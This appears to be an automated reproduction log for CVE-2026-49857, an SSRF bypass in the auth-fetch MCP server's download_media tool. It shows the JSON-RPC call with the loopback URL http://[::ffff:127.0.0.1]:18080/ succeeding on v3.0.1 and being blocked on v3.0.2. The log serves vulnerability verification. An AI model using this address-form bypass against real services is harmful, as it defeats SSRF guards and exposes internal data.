=== CVE-2026-49857 Reproduction === Date: Thu Jul 2 18:06:38 UTC 2026 ROOT: /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle REPO: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/repo BROWSER_CACHE: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers Installing system dependencies for Chrome... Chrome for Testing 145.0.7632.6 (playwright chromium v1208) Install location: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers/chromium-1208 FFmpeg (playwright ffmpeg v1011) Install location: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers/ffmpeg-1011 Chrome Headless Shell 145.0.7632.6 (playwright chromium-headless-shell v1208) Install location: /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers/chromium_headless_shell-1208 FFmpeg (playwright ffmpeg v1011) Chrome version: 145.0.7632.6 Playwright revision: 1208 Chrome headless shell already installed at /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers/chromium_headless_shell-1208/chrome-headless-shell-linux64/chrome-headless-shell Chrome for Testing already installed at /data/pruva/project-cache/c1700ca0-202a-4b72-bf90-7542807cb1eb/playwright-browsers/chromium-1208/chrome-linux64/chrome ══════════════════════════════════════════════════ Testing vulnerable (version v3.0.1) ══════════════════════════════════════════════════ HEAD is now at 98f381d 3.0.1 HEAD: 98f381d1298b6b7e7ff29d7a7851f18ea5f2364c Building... > auth-fetch-mcp@3.0.1 build > tsc Starting MCP server test... 
[VICTIM] Listening on 127.0.0.1:18080 marker=SSRF_SECRET_MARKER_1783015602673_hgnjlkyh [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"ssrf-test-client","vers [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.1"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://[::ffff:127.0.0.1]:18080/"]}}} [VICTIM:18080] 2026-07-02T18:06:43.648Z Request from 127.0.0.1 path=/ [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43\",\"downloaded\":1,\"total\":1,\"files\":[{\"url\":\"http://[::ffff:127.0.0.1]:18080/\", *** SSRF CONFIRMED [vulnerable]: Downloaded file contains internal server marker! 
*** === RESULT [vulnerable] === { "label": "vulnerable", "marker": "SSRF_SECRET_MARKER_1783015602673_hgnjlkyh", "timedOut": false, "serverStarted": true, "healthcheckPassed": true, "toolCallReceived": true, "ssrfConfirmed": true, "blocked": false, "browserError": false, "downloadedFile": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43/file-1.bin", "downloadedContent": "SSRF_SECRET_MARKER_1783015602673_hgnjlkyh", "toolResult": { "status": "ok", "directory": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43", "downloaded": 1, "total": 1, "files": [ { "url": "http://[::ffff:127.0.0.1]:18080/", "localPath": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43/file-1.bin", "size": 41 } ] }, "error": null } vulnerable RESULT: ssrfConfirmed=true blocked=false ══════════════════════════════════════════════════ Testing fixed (version v3.0.2) ══════════════════════════════════════════════════ HEAD is now at d4dedaf Merge pull request #10 from ymw0407/release/3.0.2 HEAD: d4dedaf55c1d39228dbed58807ea1f9fac1328e1 Building... > auth-fetch-mcp@3.0.2 build > tsc Starting MCP server test... 
[VICTIM] Listening on 127.0.0.1:18080 marker=SSRF_SECRET_MARKER_1783015605352_i2pfdlrc [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"ssrf-test-client","vers [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.2"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://[::ffff:127.0.0.1]:18080/"]}}} [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-fixed/.auth-fetch-mcp/downloads/2026-07-02T18-06-46\",\"downloaded\":0,\"total\":1,\"files\":[{\"url\":\"http://[::ffff:127.0.0.1]:18080/\",\"err *** BLOCKED [fixed]: Security guard rejected the URL *** === RESULT [fixed] === { "label": "fixed", "marker": "SSRF_SECRET_MARKER_1783015605352_i2pfdlrc", "timedOut": false, "serverStarted": true, "healthcheckPassed": true, "toolCallReceived": true, "ssrfConfirmed": false, "blocked": true, "browserError": false, "downloadedFile": null, "downloadedContent": null, "toolResult": { "status": "ok", "directory": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-fixed/.auth-fetch-mcp/downloads/2026-07-02T18-06-46", "downloaded": 0, "total": 1, "files": [ { "url": "http://[::ffff:127.0.0.1]:18080/", "error": "Refusing to fetch [::ffff:7f00:1] (resolves to private/loopback/link-local address ::ffff:7f00:1). 
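To allow, set AUTH_FETCH_ALLOW_PRIVATE=1 or AUTH_FETCH_ALLOW_HOSTS=[::ffff:7f00:1]" } ] }, "error": null }
fixed RESULT: ssrfConfirmed=false blocked=true
══════════════════════════════════════════════════
SUMMARY
══════════════════════════════════════════════════
Vulnerable (v3.0.1): SSRF=true Blocked=false
Fixed (v3.0.2): SSRF=false Blocked=true
Runtime manifest written to /data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/repro/runtime_manifest.json
✅ CVE-2026-49857 REPRODUCED: SSRF via IPv4-mapped IPv6 loopback bypass.
Vulnerable v3.0.1: the download_media tool fetches the loopback URL http://[::ffff:127.0.0.1]:18080/ and writes the victim server's marker to the downloads directory.
Fixed v3.0.2: the assertSafeUrl guard refuses the same URL as a private/loopback/link-local address, and nothing is downloaded.
Scope: this run covers one tool (download_media) and one address form ([::ffff:127.0.0.1], reported by the guard as ::ffff:7f00:1); it does not show how other tools or other address forms are handled. The fixed build still returns top-level status "ok", so the refusal is visible only in downloaded=0 and the per-file "error" field; callers and monitoring should check those rather than the status. The refusal message names AUTH_FETCH_ALLOW_PRIVATE=1 and AUTH_FETCH_ALLOW_HOSTS as overrides, so a deployment that sets either is not covered by the blocked result above.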